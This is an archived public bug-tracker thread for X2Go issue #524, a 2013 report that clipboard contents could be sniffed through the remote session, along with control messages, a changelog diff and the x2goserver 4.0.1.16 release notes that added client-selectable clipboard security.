2014 Received: (at control) by bugs.x2go.org; 1 Jun 2014 03:28:44 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-0.1 required=5.0 tests=BAYES_00,MISSING_SUBJECT, URIBL_BLOCKED autolearn=no version=3.3.2 Received: from freya.das-netzwerkteam.de (freya.das-netzwerkteam.de [88.198.48.199]) by ymir.das-netzwerkteam.de (Postfix) with ESMTPS id 7EFDD5DA79 for ; Sun, 1 Jun 2014 05:28:44 +0200 (CEST) Received: from grimnir.das-netzwerkteam.de (grimnir.das-netzwerkteam.de [78.46.204.98]) by freya.das-netzwerkteam.de (Postfix) with ESMTPS id 4EA342DED for ; Sun, 1 Jun 2014 05:28:44 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by grimnir.das-netzwerkteam.de (Postfix) with ESMTP id 9C9703C81B for ; Sun, 1 Jun 2014 05:28:43 +0200 (CEST) X-Virus-Scanned: Debian amavisd-new at grimnir.das-netzwerkteam.de Received: from grimnir.das-netzwerkteam.de ([127.0.0.1]) by localhost (grimnir.das-netzwerkteam.de [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id VNY0NkC-gbM4 for ; Sun, 1 Jun 2014 05:28:43 +0200 (CEST) Received: from grimnir.das-netzwerkteam.de (localhost [127.0.0.1]) by grimnir.das-netzwerkteam.de (Postfix) with ESMTPS id 086A03C0CF for ; Sun, 1 Jun 2014 05:28:43 +0200 (CEST) Received: from p5B2855DE.dip0.t-ipconnect.de (p5B2855DE.dip0.t-ipconnect.de [91.40.85.222]) by mail.das-netzwerkteam.de (Horde Framework) with HTTP; Sun, 01 Jun 2014 03:28:42 +0000 Date: Sun, 01 Jun 2014 03:28:42 +0000 Message-ID: <20140601032842.Horde.hGe57FrJWSM0osjmmM-bZg2@mail.das-netzwerkteam.de> From: Mike Gabriel To: control@bugs.x2go.org User-Agent: Internet Messaging Program (IMP) H5 (6.1.7) Accept-Language: en,de Organization: DAS-NETZWERKTEAM X-Originating-IP: 91.40.85.222 X-Remote-Browser: Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0 Iceweasel/29.0.1 Content-Type: multipart/signed; boundary="=_zvdcdcG2-3cUU3TbvjxXoA1"; protocol="application/pgp-signature"; micalg=pgp-sha1 MIME-Version: 1.0 This message is in MIME format and has been PGP signed. --=_zvdcdcG2-3cUU3TbvjxXoA1 Content-Type: text/plain; charset=UTF-8; format=flowed; DelSp=Yes Content-Disposition: inline Content-Transfer-Encoding: quoted-printable clone #258 -1 -2 -3 -4 reassign -1 x2goserver reassign -2 pyhoca-gui reassign -3 python-x2go reassign -4 wiki.x2go.org retitle -1 Add option to x2goserver.conf for disabling server-side=20=20 clipboard=20globally retitle -2 Add option to pyhoca-gui's profile manager to disable=20=20 client-side=20clipboard (per session profile) retitle -3 Add support to X2GoSession class for disabling client-side=20=20 clipboard retitle=20-4 Better document NX/X11 security issues of X2Go (e.g.=20=20 clipboard=20sniffing) thanks --=20 DAS-NETZWERKTEAM mike=20gabriel, herweg 7, 24357 fleckeby fon: +49 (1520) 1976 148 GnuPG Key ID 0x25771B31 mail: mike.gabriel@das-netzwerkteam.de, http://das-netzwerkteam.de freeBusy: https://mail.das-netzwerkteam.de/freebusy/m.gabriel%40das-netzwerkteam.de.x= fb --=_zvdcdcG2-3cUU3TbvjxXoA1 Content-Type: application/pgp-signature Content-Description: Digitale PGP-Signatur Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAABAgAGBQJTip3qAAoJEJr0azAldxsx/toQAJmDizaUywzQRgHz8sg4RN71 zqfsP+7T8Q8MJC6dg0h5zKx9C2spgG8NcY1gUr4IBLXgI/KE0X5W6Txcx0UJ+IbT 5ahXiOovF9ekoQSsz2lgmQMOCp2k2+WgcrB/Ae38YA2ZtBOgMV/KqExB2BGpqW/f op1gYqxgvzgdVt80tI2wWmbJcddc5tCdTskXmi0UY2AyZwomOB4L8FDtvXnUo6fi XylMDBpv7HDqQh1QzzhVrFODXTSAyNYYGY5eBPX89NHQHluqLy9doL3jCjUom1EK 7/GCfkBr3DVj1j3CMhQyy3/SfZX/MG1AZUznngyNxMSkwfeezJoQd3MESrvW20xC 68DZ+JGQsK4UnPQ7ZGUHxZRKxdLgO58TzVzVvBCPB37+puYdkRllY6rUzGWl+zjN tiSaUniC1i7UBBpgrZiFY07RWLhU7o674FCjJrvlay+slhUE/aXVA9GRgH7kodfM LNsihgr0ZZ9ynTV4O7bhLUIk0Rei9QNQF8UJ43gRjhDqs4sp2h2FCZ0tp/2ITcQN 4CvA5UZ5mMHP4ySlk7v41LQD5C/2cSxy7VrfdG/VSJmQ5EXvlTlvaiX4VVhMAaj6 oT18biGTvpwUkJZ8u3d6Aepz8QKssTrYP55ZJRYvuKI1qqgGifb4dfd0oBri9tE1 2GiW08otgSOTdVckFT/n =4Bt+ -----END PGP SIGNATURE----- --=_zvdcdcG2-3cUU3TbvjxXoA1-- From mike.gabriel@das-netzwerkteam.de Fri Jun 27 20:13:19 2014 Received: (at 258) by bugs.x2go.org; 27 Jun 2014 18:13:35 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00 autolearn=unavailable version=3.3.2 Received: from freya.das-netzwerkteam.de (freya.das-netzwerkteam.de [88.198.48.199]) by ymir.das-netzwerkteam.de (Postfix) with ESMTPS id E05335DB09; Fri, 27 Jun 2014 20:13:18 +0200 (CEST) Received: from grimnir.das-netzwerkteam.de (grimnir.das-netzwerkteam.de [78.46.204.98]) by freya.das-netzwerkteam.de (Postfix) with ESMTPS id 6C22A122DB; Fri, 27 Jun 2014 20:13:18 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by grimnir.das-netzwerkteam.de (Postfix) with ESMTP id EC0F33BA0E; Fri, 27 Jun 2014 20:13:17 +0200 (CEST) X-Virus-Scanned: Debian amavisd-new at grimnir.das-netzwerkteam.de Received: from grimnir.das-netzwerkteam.de ([127.0.0.1]) by localhost (grimnir.das-netzwerkteam.de [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id r8TIn30qdEAG; Fri, 27 Jun 2014 20:13:17 +0200 (CEST) Received: from grimnir.das-netzwerkteam.de (localhost [127.0.0.1]) by grimnir.das-netzwerkteam.de (Postfix) with ESMTPS id ACFE53B8A9; Fri, 27 Jun 2014 20:13:17 +0200 (CEST) Received: from pD9E9F072.dip0.t-ipconnect.de (pD9E9F072.dip0.t-ipconnect.de [217.233.240.114]) by mail.das-netzwerkteam.de (Horde Framework) with HTTP; Fri, 27 Jun 2014 18:13:17 +0000 Date: Fri, 27 Jun 2014 18:13:17 +0000 Message-ID: <20140627181317.Horde.7sxaRMi5BeO4m3MoL5JiUQ1@mail.das-netzwerkteam.de> From: Mike Gabriel To: 258@bugs.x2go.org Cc: control@bugs.x2go.org, 507@bugs.x2go.org, 508@bugs.x2go.org Subject: Make clipboard security choosable from client User-Agent: Internet Messaging Program (IMP) H5 (6.1.7) Accept-Language: en,de Organization: DAS-NETZWERKTEAM X-Originating-IP: 217.233.240.114 X-Remote-Browser: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 Iceweasel/30.0 Content-Type: multipart/signed; boundary="=_HD6JexkNSa-PhYyzptN_zg1"; protocol="application/pgp-signature"; micalg=pgp-sha1 MIME-Version: 1.0 This message is in MIME format and has been PGP signed. --=_HD6JexkNSa-PhYyzptN_zg1 Content-Type: text/plain; charset=UTF-8; format=flowed; DelSp=Yes Content-Disposition: inline Content-Transfer-Encoding: quoted-printable clone #258 -1 reassign -1 x2goserver retitle -1 Provide support in X2Go Server for making clipboard=20=20 security=20choosable by the client block #258 by -1 block #507 by -1 block #508 by -1 thanks Hi all, I am currently working on making the clipboard modes configurable on=20=20 the=20X2Go Client side. Clipboard modes in NX are: o c+p in both directions (server->client, client->server) o c+p server->client o c+p client->server o no copy+paste at all Greets, Mike --=20 DAS-NETZWERKTEAM mike=20gabriel, herweg 7, 24357 fleckeby fon: +49 (1520) 1976 148 GnuPG Key ID 0x25771B31 mail: mike.gabriel@das-netzwerkteam.de, http://das-netzwerkteam.de freeBusy: https://mail.das-netzwerkteam.de/freebusy/m.gabriel%40das-netzwerkteam.de.x= fb --=_HD6JexkNSa-PhYyzptN_zg1 Content-Type: application/pgp-signature Content-Description: Digitale PGP-Signatur Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAABAgAGBQJTrbQ9AAoJEJr0azAldxsxFnkP/0qbDJ3eQGFsrX9a10qvKMdO adavpDHiF0LrDadyUdGlY5ly23twUL86lgs8jOwGnLWv1aa76K6DX9FYq4shtj6B ot2fpQPOSdCaO/j9CahPsjEzpUVcwuEFwOUylFUL3yy8v/VNvgPfz311fnbKal3m yBf0D0IBN+XPbEg1gb5BU03JZoM9qsazKfbAfs1VXL8k/0/hamgr5I4Uetm/d0y+ DpntZlEtw3pMxg4BJXArt2FA/ym96EPCCnsLjSmQbYLOKBns7umyz6eL0N1kOFRK CKD7Cb3rb5RSZwkvhFYYGirXLpBSD7zUATZ4UJV767DmJMLP5tZZP/xhoUkgRvAi Es5kn3GZeaFsYjmnqjDwQJ+Fk8L2GvPbpf88+5Avec4LTp5LB5AQH3ddZ/ChQjX0 hs4T5LAyQEY26YBoskEx4ckS1+A4po86/5844DGNGD0wKLKAYn8eDRQ5bYJsuhBU EX2gq3vHt7cS5EVVqGCOSbrHqQ2JdHn41BTTK1Scf2YT1gbDwIOULjxeJH35+iNf N/bGUdpAoj0ys5hYfiRXtCcGkXwMVDPA6wW5bvSI3DinRrtXCUsoPc5zUqCuevG8 MOTvDIdDRg6zHkVpSfnky+onq9rtqP7m3sy13u9rLuINL/nXXYhMFJUoupQ6LNcM xPlUgXkI4qy1Sql1qXGa =xSsj -----END PGP SIGNATURE----- --=_HD6JexkNSa-PhYyzptN_zg1-- From x2go@ymir.das-netzwerkteam.de Sun Jun 29 00:20:11 2014 Received: (at 524) by bugs.x2go.org; 28 Jun 2014 22:20:12 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00,NO_RELAYS autolearn=ham version=3.3.2 Received: by ymir.das-netzwerkteam.de (Postfix, from userid 1005) id 687805DB53; Sun, 29 Jun 2014 00:20:11 +0200 (CEST) From: Mike Gabriel To: 524-submitter@bugs.x2go.org Cc: control@bugs.x2go.org, 524@bugs.x2go.org Subject: X2Go issue (in src:x2goserver) has been marked as pending for release Content-Type: text/plain; charset=utf-8 Content-Disposition: inline Content-Transfer-Encoding: 8bit X-Mailer: http://snipr.com/post-receive-tag-pending Message-Id: <20140628222011.687805DB53@ymir.das-netzwerkteam.de> Date: Sun, 29 Jun 2014 00:20:11 +0200 (CEST) tag #524 pending fixed #524 4.0.1.16 thanks Hello, X2Go issue #524 (src:x2goserver) reported by you has been fixed in X2Go Git. You can see the changelog below, and you can check the diff of the fix at: http://code.x2go.org/gitweb?p=x2goserver.git;a=commitdiff;h=6232fbb The issue will most likely be fixed in src:x2goserver (4.0.1.16). light+love X2Go Git Admin (on behalf of the sender of this mail) --- commit 6232fbb825df7e1538ab1f1ab42fec5b02c50a55 Author: Mike Gabriel Date: Sun Jun 29 00:18:07 2014 +0200 Provide support for client-side choice of clipboard security. (Fixes: #524). diff --git a/debian/changelog b/debian/changelog index ec15d3d..4384a31 100644 --- a/debian/changelog +++ b/debian/changelog @@ -46,6 +46,8 @@ x2goserver (4.0.1.16-0x2go1) UNRELEASED; urgency=low - Don't die if no session state file is found, as it will break X2Go completely after upgrading from versions << 4.0.1.16 if sessions are still running/suspended during package upgrade. + - Provide support for client-side choice of clipboard security. (Fixes: + #524). * debian/control, x2goserver.spec: + Update versioned D: x2goagent (>= 3.5.0.25). This assures that X2Go works with poly-instantiated /tmp directories. From x2go@ymir.das-netzwerkteam.de Fri Sep 26 00:42:16 2014 Received: (at 524) by bugs.x2go.org; 25 Sep 2014 22:42:52 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00,NO_RELAYS autolearn=ham version=3.3.2 Received: by ymir.das-netzwerkteam.de (Postfix, from userid 1005) id B51065E0AE; Fri, 26 Sep 2014 00:42:15 +0200 (CEST) From: Mike Gabriel To: 524-submitter@bugs.x2go.org Cc: control@bugs.x2go.org, 524@bugs.x2go.org Subject: X2Go issue (in src:x2goserver) has been marked as closed Content-Type: text/plain; charset=utf-8 Content-Disposition: inline Content-Transfer-Encoding: 8bit Message-Id: <20140925224215.B51065E0AE@ymir.das-netzwerkteam.de> Date: Fri, 26 Sep 2014 00:42:15 +0200 (CEST) close #524 thanks Hello, we are very hopeful that X2Go issue #524 reported by you has been resolved in the new release (4.0.1.16) of the X2Go source project »src:x2goserver«. You can view the complete changelog entry of src:x2goserver (4.0.1.16) below, and you can use the following link to view all the code changes between this and the last release of src:x2goserver. http://code.x2go.org/gitweb?p=x2goserver.git;a=commitdiff;h=c43b862f2ae0e8980fb7ab5e519d692b07da5a45;hp=98c4f84d83d701823b7887f79d0d9f5ce8233bd4 If you feel that the issue has not been resolved satisfyingly, feel free to reopen this bug report or submit a follow-up report with further observations described based on the new released version of src:x2goserver. Thanks a lot for contributing to X2Go!!! light+love X2Go Git Admin (on behalf of the sender of this mail) --- X2Go Component: src:x2goserver Version: 4.0.1.16-0x2go1 Status: RELEASE Date: Fri, 26 Sep 2014 00:36:32 +0200 Fixes: 122 302 397 406 407 458 468 495 506 511 520 523 524 543 547 558 569 572 573 574 599 605 606 617 619 Changes: x2goserver (4.0.1.16-0x2go1) RELEASED; urgency=low . [ Mike DePaulo ] * New upstream release (4.0.1.16): - Make X2Go Server aware of the Openbox desktop environment (Command: OPENBOX) (Fixes: #605) - Make X2Go Server aware of the IceWM desktop environment (Command: ICEWM) (Fixes: #606) - Support GNOME Flashback session (GNOME 3.8+) on distro releases such as Ubuntu 13.10+ and debian Jessie (NOTE: For most users, GNOME Flashback currently will not work. This requires that gnome-flashback.session actually be installed. Not every Linux distro has it available. It also requires that the gnome-session binary not require hardware 3D acceleration for said session. Currently, upstream GNOME and GNOME 3.8+ in all Linux distros do require this, only 3rd party builds do not. See X2Go bug #599 for example.) (Thanks Eugene San (eugenesan@gmail.com)) - Fix launching GNOME 3 Fallback session (GNOME 3.4 & 3.6) on distros other than Ubuntu and Debian (Fixes: #599) - Fix support for Cinnamon 1.4 (Linux Mint 13) (Fixes: #569) - Fix the logic for launching Cinnamon 2.0 and 2.2 (Linux Mint 17). (Fixes: #572) NOTE: Fixing this bug in x2goserver is not sufficient to make Cinnamon 2.0 & 2.2 to work properly with X2Go. Bug #150 in nx-libs is still a problem. Fixing this bug enables Cinnamon 2.0 and 2.2 to launch to their "fallback mode", which has many bugs and missing features when compared to "software rendering" mode (cinnamon2d), but is still better than nothing. * debian/rules: + Improve dh_auto_clean override. . [ Mike Gabriel ] * New upstream version (4.0.1.16): - Let x2goversion exit with an error if the X2Go component cannot be found. - Detect terminated sessions from NX log file. Also interpret a session as terminated if terminating just has started. - Detect started/starting/resumed/resuming sessions by explicitly scanning the NX session log file for those keywords. - Interpret NX sessions marked as "aborting session" as (not yet) terminated sessions. - Provide config option for server-side/global clipboard behaviour in x2goagent.options. (Fixes: #506). - Be aware of poly-instantiated /tmp directories bind-mounted under /tmp-inst. (Fixes: #406). - On suspend: Call x2goumount-session before sending SIGHUP to x2goagent. - Refuse client communcation if server-side hostname is not set up correctly (Fixes: #468). - Fix string comparison in x2goumount-session. - Fix problems with unmounting shared folders on session suspension/ termination. Remove extra parentheses from the fusermount execution call. (Fixes: #407). - Use type -p instead of which in x2goumount-session. Suppress output to stdout properly. - Use if--then--else--fi during x2goagent resuming in x2goresume-session script. - More reliably sync the NX session state with the status information in the X2Go session DB. - x2golistdesktops: Also detect sharable desktop sessions behind abstract kernel namespace sockets. - Add logcheck rules for X2Go Server. Thanks to Frank Werner for sending them in. - Correctly use diversions from stderr to stdout in shell commands. (Fixes: #520). - Don't die if no session state file is found, as it will break X2Go completely after upgrading from versions << 4.0.1.16 if sessions are still running/suspended during package upgrade. - Provide support for client-side choice of clipboard security. (Fixes: #524). - Use more quotes in x2goruncommand. - Detect the exit of rootless applications that forked to background on application execution. (Fixes: #122). - Make x2goruncommand more robust. - Don't fail Xsession startup if any of the profile scripts returns with an error. - Silently timeout in x2golistdesktops if calls to x2golistsessions and/or xwininfo don't produce output within one second. (Fixes: #543). - Allow email addresses as login usernames. (Fixes: #573). - Abort session startup if env var $USER or $SSH_CLIENT are not set. (Fixes: #558). - Allow length of username up to 48 characters (was: 32 characters). (Fixes: #574). - Abort session if env var $HOME is not set or if $HOME contains non-ASCII characters. (Fixes: #397). - Export XAUTHORITY env var in x2goruncommand to enable privilege upgrade for applications started via pkexec. (Fixes: #458). - x2gocleansessions: Don't print to stderr if the session state file cannot be found. This can happen during session startups. Report to system log instead. - Don't use Perl package File::ReadBackwards anymore. - Fix x2gormforward for 4.0.1.x release series (the X2Go::Log Perl module only exists in X2Go Server >= 4.1.0.0, the 4.0.1.x release series has to use x2gologlevel.pm in `x2gopath lib`. (Fixes: #617). - Pick x2gogetagentstate from 4.1.0.0 release series and adapt to usage with X2Go Server 4.0.1.x. (Fixes: #619). * debian/control, x2goserver.spec: + Update versioned D: x2goagent (>= 3.5.0.25). This assures that X2Go works with poly-instantiated /tmp directories. + Make sure x2gogetagentstate gets packaged in bin:package x2goserver. + Bump Standards: to 3.9.5. No changes needed. + Mark x2goserver-pyhoca bin:package as deprecated. + Drop D (x2goserver): libfile-readbackwards-perl. * x2goserver.spec: + Install {libdir}/x2go/x2gormforward into bin:package x2goserver. + Drop R (x2goserver): perl(File::ReadBackwards). . [ Oleksandr Shneyder ] * New upstream version (4.0.1.16): - x2gostartagent, x2golistsession, x2gosuspend-session and x2goresume-session getting agent state from ~/.x2go/C-$SID/state. This should help to avoid session damage. Remove nxcleanup. (Fixes: #302, #511). - Move session file to /tmp/.x2go-$USER. (Fixes: #523). - Fix x2gostartagent failures if kbd is not "auto". Remove comma at end of options file. - Set default value for clipboard to "both" in x2gostartagent and x2goresume-session. - Clean user SSHD process if connection between server and client lost. This should fix error "Global request tcpip-forward failed". (Fixes: #495, #547). . [ Orion Paplowski ] * x2goserver.spec: + Sync Fedora .spec file with our upstream-provided x2goserver.spec. From unknown Thu Mar 28 15:39:36 2024 MIME-Version: 1.0 X-Mailer: MIME-tools 5.502 (Entity 5.502) X-Loop: owner@bugs.x2go.org From: owner@bugs.x2go.org (X2Go Bug Tracking System) Subject: Bug#524 closed by Mike Gabriel (X2Go issue (in src:x2goserver) has been marked as closed) Message-ID: References: <20140925224215.B51065E0AE@ymir.das-netzwerkteam.de> X-X2go-PR-Keywords: security pending X-X2go-PR-Message: they-closed 524 X-X2go-PR-Package: x2goserver X-X2go-PR-Source: x2goserver Date: Thu, 25 Sep 2014 22:45:43 +0000 Content-Type: multipart/mixed; boundary="----------=_1411685143-21712-0" This is a multi-part message in MIME format... ------------=_1411685143-21712-0 Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset=utf-8 This is an automatic notification regarding your Bug report which was filed against the x2goserver package: #524: Provide support in X2Go Server for making clipboard It has been closed by Mike Gabriel . Their explanation is attached below along with your original report. If this explanation is unsatisfactory and you have not received a better one in a separate message then please contact Mike Gabriel by replying to this email. --=20 X2Go Bug Tracking System Contact owner@bugs.x2go.org with problems ------------=_1411685143-21712-0 Content-Type: message/rfc822 Content-Disposition: inline Content-Transfer-Encoding: 7bit Received: (at control) by bugs.x2go.org; 25 Sep 2014 22:43:43 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00,NO_RELAYS autolearn=unavailable version=3.3.2 Received: by ymir.das-netzwerkteam.de (Postfix, from userid 1005) id B51065E0AE; Fri, 26 Sep 2014 00:42:15 +0200 (CEST) From: Mike Gabriel To: 524-submitter@bugs.x2go.org Cc: control@bugs.x2go.org, 524@bugs.x2go.org Subject: X2Go issue (in src:x2goserver) has been marked as closed Content-Type: text/plain; charset=utf-8 Content-Disposition: inline Content-Transfer-Encoding: 8bit Message-Id: <20140925224215.B51065E0AE@ymir.das-netzwerkteam.de> Date: Fri, 26 Sep 2014 00:42:15 +0200 (CEST) close #524 thanks Hello, we are very hopeful that X2Go issue #524 reported by you has been resolved in the new release (4.0.1.16) of the X2Go source project »src:x2goserver«. You can view the complete changelog entry of src:x2goserver (4.0.1.16) below, and you can use the following link to view all the code changes between this and the last release of src:x2goserver. http://code.x2go.org/gitweb?p=x2goserver.git;a=commitdiff;h=c43b862f2ae0e8980fb7ab5e519d692b07da5a45;hp=98c4f84d83d701823b7887f79d0d9f5ce8233bd4 If you feel that the issue has not been resolved satisfyingly, feel free to reopen this bug report or submit a follow-up report with further observations described based on the new released version of src:x2goserver. Thanks a lot for contributing to X2Go!!! light+love X2Go Git Admin (on behalf of the sender of this mail) --- X2Go Component: src:x2goserver Version: 4.0.1.16-0x2go1 Status: RELEASE Date: Fri, 26 Sep 2014 00:36:32 +0200 Fixes: 122 302 397 406 407 458 468 495 506 511 520 523 524 543 547 558 569 572 573 574 599 605 606 617 619 Changes: x2goserver (4.0.1.16-0x2go1) RELEASED; urgency=low . [ Mike DePaulo ] * New upstream release (4.0.1.16): - Make X2Go Server aware of the Openbox desktop environment (Command: OPENBOX) (Fixes: #605) - Make X2Go Server aware of the IceWM desktop environment (Command: ICEWM) (Fixes: #606) - Support GNOME Flashback session (GNOME 3.8+) on distro releases such as Ubuntu 13.10+ and debian Jessie (NOTE: For most users, GNOME Flashback currently will not work. This requires that gnome-flashback.session actually be installed. Not every Linux distro has it available. It also requires that the gnome-session binary not require hardware 3D acceleration for said session. Currently, upstream GNOME and GNOME 3.8+ in all Linux distros do require this, only 3rd party builds do not. See X2Go bug #599 for example.) (Thanks Eugene San (eugenesan@gmail.com)) - Fix launching GNOME 3 Fallback session (GNOME 3.4 & 3.6) on distros other than Ubuntu and Debian (Fixes: #599) - Fix support for Cinnamon 1.4 (Linux Mint 13) (Fixes: #569) - Fix the logic for launching Cinnamon 2.0 and 2.2 (Linux Mint 17). (Fixes: #572) NOTE: Fixing this bug in x2goserver is not sufficient to make Cinnamon 2.0 & 2.2 to work properly with X2Go. Bug #150 in nx-libs is still a problem. Fixing this bug enables Cinnamon 2.0 and 2.2 to launch to their "fallback mode", which has many bugs and missing features when compared to "software rendering" mode (cinnamon2d), but is still better than nothing. * debian/rules: + Improve dh_auto_clean override. . [ Mike Gabriel ] * New upstream version (4.0.1.16): - Let x2goversion exit with an error if the X2Go component cannot be found. - Detect terminated sessions from NX log file. Also interpret a session as terminated if terminating just has started. - Detect started/starting/resumed/resuming sessions by explicitly scanning the NX session log file for those keywords. - Interpret NX sessions marked as "aborting session" as (not yet) terminated sessions. - Provide config option for server-side/global clipboard behaviour in x2goagent.options. (Fixes: #506). - Be aware of poly-instantiated /tmp directories bind-mounted under /tmp-inst. (Fixes: #406). - On suspend: Call x2goumount-session before sending SIGHUP to x2goagent. - Refuse client communcation if server-side hostname is not set up correctly (Fixes: #468). - Fix string comparison in x2goumount-session. - Fix problems with unmounting shared folders on session suspension/ termination. Remove extra parentheses from the fusermount execution call. (Fixes: #407). - Use type -p instead of which in x2goumount-session. Suppress output to stdout properly. - Use if--then--else--fi during x2goagent resuming in x2goresume-session script. - More reliably sync the NX session state with the status information in the X2Go session DB. - x2golistdesktops: Also detect sharable desktop sessions behind abstract kernel namespace sockets. - Add logcheck rules for X2Go Server. Thanks to Frank Werner for sending them in. - Correctly use diversions from stderr to stdout in shell commands. (Fixes: #520). - Don't die if no session state file is found, as it will break X2Go completely after upgrading from versions << 4.0.1.16 if sessions are still running/suspended during package upgrade. - Provide support for client-side choice of clipboard security. (Fixes: #524). - Use more quotes in x2goruncommand. - Detect the exit of rootless applications that forked to background on application execution. (Fixes: #122). - Make x2goruncommand more robust. - Don't fail Xsession startup if any of the profile scripts returns with an error. - Silently timeout in x2golistdesktops if calls to x2golistsessions and/or xwininfo don't produce output within one second. (Fixes: #543). - Allow email addresses as login usernames. (Fixes: #573). - Abort session startup if env var $USER or $SSH_CLIENT are not set. (Fixes: #558). - Allow length of username up to 48 characters (was: 32 characters). (Fixes: #574). - Abort session if env var $HOME is not set or if $HOME contains non-ASCII characters. (Fixes: #397). - Export XAUTHORITY env var in x2goruncommand to enable privilege upgrade for applications started via pkexec. (Fixes: #458). - x2gocleansessions: Don't print to stderr if the session state file cannot be found. This can happen during session startups. Report to system log instead. - Don't use Perl package File::ReadBackwards anymore. - Fix x2gormforward for 4.0.1.x release series (the X2Go::Log Perl module only exists in X2Go Server >= 4.1.0.0, the 4.0.1.x release series has to use x2gologlevel.pm in `x2gopath lib`. (Fixes: #617). - Pick x2gogetagentstate from 4.1.0.0 release series and adapt to usage with X2Go Server 4.0.1.x. (Fixes: #619). * debian/control, x2goserver.spec: + Update versioned D: x2goagent (>= 3.5.0.25). This assures that X2Go works with poly-instantiated /tmp directories. + Make sure x2gogetagentstate gets packaged in bin:package x2goserver. + Bump Standards: to 3.9.5. No changes needed. + Mark x2goserver-pyhoca bin:package as deprecated. + Drop D (x2goserver): libfile-readbackwards-perl. * x2goserver.spec: + Install {libdir}/x2go/x2gormforward into bin:package x2goserver. + Drop R (x2goserver): perl(File::ReadBackwards). . [ Oleksandr Shneyder ] * New upstream version (4.0.1.16): - x2gostartagent, x2golistsession, x2gosuspend-session and x2goresume-session getting agent state from ~/.x2go/C-$SID/state. This should help to avoid session damage. Remove nxcleanup. (Fixes: #302, #511). - Move session file to /tmp/.x2go-$USER. (Fixes: #523). - Fix x2gostartagent failures if kbd is not "auto". Remove comma at end of options file. - Set default value for clipboard to "both" in x2gostartagent and x2goresume-session. - Clean user SSHD process if connection between server and client lost. This should fix error "Global request tcpip-forward failed". (Fixes: #495, #547). . [ Orion Paplowski ] * x2goserver.spec: + Sync Fedora .spec file with our upstream-provided x2goserver.spec. ------------=_1411685143-21712-0 Content-Type: message/rfc822 Content-Disposition: inline Content-Transfer-Encoding: 7bit Received: (at submit) by bugs.x2go.org; 1 Jul 2013 02:46:32 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=0.0 required=5.0 tests=RCVD_IN_DNSWL_BLOCKED autolearn=ham version=3.3.2 X-Greylist: delayed 469 seconds by postgrey-1.34 at ymir; Mon, 01 Jul 2013 04:46:32 CEST Received: from mailgw01.dd24.net (mailgw01.dd24.net [193.46.215.41]) by ymir (Postfix) with ESMTPS id 319B85DA79 for ; Mon, 1 Jul 2013 04:46:32 +0200 (CEST) Received: from localhost (amavis01.dd24.net [192.168.1.111]) by mailgw01.dd24.net (Postfix) with ESMTP id C88377CC194 for ; Mon, 1 Jul 2013 02:38:43 +0000 (GMT) X-Virus-Scanned: domaindiscount24.com mail filter gateway Received: from mailgw01.dd24.net ([192.168.1.191]) by localhost (amavis01.dd24.net [192.168.1.105]) (amavisd-new, port 10191) with ESMTP id ZbrxJaRO-CAr for ; Mon, 1 Jul 2013 02:38:39 +0000 (GMT) Received: from [192.168.0.102] (host-188-174-220-133.customer.m-online.net [188.174.220.133]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (No client certificate requested) by mailgw01.dd24.net (Postfix) with ESMTPSA id E155A7CC16C for ; Mon, 1 Jul 2013 02:38:38 +0000 (GMT) Message-ID: <1372646308.18508.2.camel@heisenberg.scientia.net> Subject: SECURITY: x2goclient allows clipboard sniffing From: Christoph Anton Mitterer To: submit@bugs.x2go.org Date: Mon, 01 Jul 2013 04:38:28 +0200 Content-Type: text/plain; charset="UTF-8" X-Mailer: Evolution 3.4.4-3 Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Package: x2goclient Severity: grave Tags: security Hi. From: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=714588 It seems that per default (and I even found no way to disable it) x2goclient (and perhaps other related tools?) transmit the content of the clipboard to the remote host. As this may easily contain passwords or other sensitive information, this is a extremely critical hole. Cheers, Chris. ------------=_1411685143-21712-0-- From unknown Thu Mar 28 15:39:36 2024 Received: (at fakecontrol) by fakecontrolmessage; To: internal_control@bugs.x2go.org From: Debbugs Internal Request Subject: Internal Control Message-Id: Bug archived. Date: Fr, 24 Okt 2014 05:24:02 +0000 User-Agent: Fakemail v42.6.9 # A New Hope # A long time ago, in a galaxy far, far away # something happened. # # Magically this resulted in the following # action being taken, but this fake control # message doesn't tell you why it happened # # The action: # Bug archived. thanks # This fakemail brought to you by your local debbugs # administrator